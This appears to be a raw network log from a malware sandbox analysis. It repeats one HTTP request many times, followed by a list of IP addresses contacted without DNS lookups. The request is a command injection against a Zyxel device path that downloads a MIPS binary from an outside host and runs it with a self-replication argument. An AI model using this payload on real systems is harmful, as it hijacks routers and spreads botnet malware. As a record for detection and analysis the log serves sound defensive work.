            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: unknownTCP traffic detected without corresponding DNS query: 132.14.130.191
            Source: unknownTCP traffic detected without corresponding DNS query: 172.85.94.191
            Source: unknownTCP traffic detected without corresponding DNS query: 122.137.14.189
            Source: unknownTCP traffic detected without corresponding DNS query: 177.27.98.174
            Source: unknownTCP traffic detected without corresponding DNS query: 205.36.206.115
            Source: unknownTCP traffic detected without corresponding DNS query: 145.206.195.153
            Source: unknownTCP traffic detected without corresponding DNS query: 179.97.21.146
            Source: unknownTCP traffic detected without corresponding DNS query: 72.181.109.55
            Source: unknownTCP traffic detected without corresponding DNS query: 132.14.130.191
            Source: unknownTCP traffic detected without corresponding DNS query: 192.148.45.230
            Source: unknownTCP traffic detected without corresponding DNS query: 193.49.129.33
            Source: unknownTCP traffic detected without corresponding DNS query: 108.11.138.140
            Source: unknownTCP traffic detected without corresponding DNS query: 80.51.230.192
            Source: unknownTCP traffic detected without corresponding DNS query: 172.85.94.191
            Source: unknownTCP traffic detected without corresponding DNS query: 122.6.69.241
            Source: unknownTCP traffic detected without corresponding DNS query: 73.123.130.61
            Source: unknownTCP traffic detected without corresponding DNS query: 220.118.176.113
            Source: unknownTCP traffic detected without corresponding DNS query: 83.239.118.115
            Source: unknownTCP traffic detected without corresponding DNS query: 168.234.38.225
            Source: unknownTCP traffic detected without corresponding DNS query: 82.149.217.105
            Source: unknownTCP traffic detected without corresponding DNS query: 23.158.229.53
            Source: unknownTCP traffic detected without corresponding DNS query: 75.213.104.73
            Source: unknownTCP traffic detected without corresponding DNS query: 220.118.176.113
            Source: unknownTCP traffic detected without corresponding DNS query: 193.49.129.33
            Source: unknownTCP traffic detected without corresponding DNS query: 108.11.138.140
            Source: unknownTCP traffic detected without corresponding DNS query: 122.6.69.241
            Source: unknownTCP traffic detected without corresponding DNS query: 73.123.130.61
            Source: unknownTCP traffic detected without corresponding DNS query: 206.11.12.244
            Source: unknownTCP traffic detected without corresponding DNS query: 83.239.118.115
            Source: unknownTCP traffic detected without corresponding DNS query: 168.234.38.225
            Source: unknownTCP traffic detected without corresponding DNS query: 92.107.179.73
            Source: unknownTCP traffic detected without corresponding DNS query: 206.11.12.244
            Source: unknownTCP traffic detected without corresponding DNS query: 23.158.229.53
            Source: unknownTCP traffic detected without corresponding DNS query: 82.149.217.105
            Source: unknownTCP traffic detected without corresponding DNS query: 92.107.179.73
            Source: unknownTCP traffic detected without corresponding DNS query: 75.213.104.73
            Source: unknownTCP traffic detected without corresponding DNS query: 195.47.9.45
            Source: unknownTCP traffic detected without corresponding DNS query: 80.51.230.192
            Source: unknownTCP traffic detected without corresponding DNS query: 4.5.28.170
            Source: unknownTCP traffic detected without corresponding DNS query: 216.126.200.217
            Source: unknownTCP traffic detected without corresponding DNS query: 221.229.21.222
            Source: unknownTCP traffic detected without corresponding DNS query: 81.87.157.118
            Source: unknownTCP traffic detected without corresponding DNS query: 75.165.192.200
            Source: unknownTCP traffic detected without corresponding DNS query: 216.126.200.217
            Source: unknownTCP traffic detected without corresponding DNS query: 195.47.9.45
            Source: unknownTCP traffic detected without corresponding DNS query: 221.229.21.222
            Source: unknownTCP traffic detected without corresponding DNS query: 204.197.56.54
            Source: unknownTCP traffic detected without corresponding DNS query: 4.5.28.170
            Source: unknownTCP traffic detected without corresponding DNS query: 172.180.93.22
            Source: unknownTCP traffic detected without corresponding DNS query: 81.87.157.118
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
